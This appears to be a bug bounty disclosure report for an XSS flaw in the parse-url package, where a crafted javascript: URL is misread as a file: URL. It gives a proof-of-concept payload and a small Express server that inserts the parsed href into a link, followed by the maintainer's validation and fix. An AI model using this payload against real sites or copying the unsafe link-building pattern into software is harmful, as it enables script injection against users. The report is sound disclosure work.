xss via improper parsing of javascript: url in ionicabizau/parse-url

Valid

Reported on

Jul 18th 2022


Description

A URL like javascript://e[xamp]le.com%0aalert(1) will get incorrectly recognised as a file: protocol. It has nothing to do with escaping as the common characters such as &, >, <, " and ' are not present in the URL

Proof of Concept

const parseUrl = require("parse-url"); 
const express = require('express');
const app = express();

parsed = parseUrl("javascript://e[xamp]le.com%0aalert(1)");
console.log(parsed);

app.get('/', (req, res) => {
    if (parsed.protocol !== "javascript") {
        res.send("<a href=\'" + parsed.href + "\'>CLICK ME!</a>")
    }
})

app.listen(9999);

Impact

XSS

We are processing your report and will contact the ionicabizau/parse-url team within 24 hours. 25 days ago
We have contacted a member of the ionicabizau/parse-url team and are waiting to hear back 24 days ago
We have sent a follow up to the ionicabizau/parse-url team. We will try again in 7 days. 21 days ago
Ionică Bizău (Johnny B.) validated this vulnerability 18 days ago

Hi! Thank you for this finding!

haxatron has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
We have sent a fix follow up to the ionicabizau/parse-url team. We will try again in 7 days. 15 days ago
Ionică Bizău (Johnny B.) confirmed that a fix has been merged on b88c81 9 days ago
Ionică Bizău (Johnny B.) has been awarded the fix bounty
to join this conversation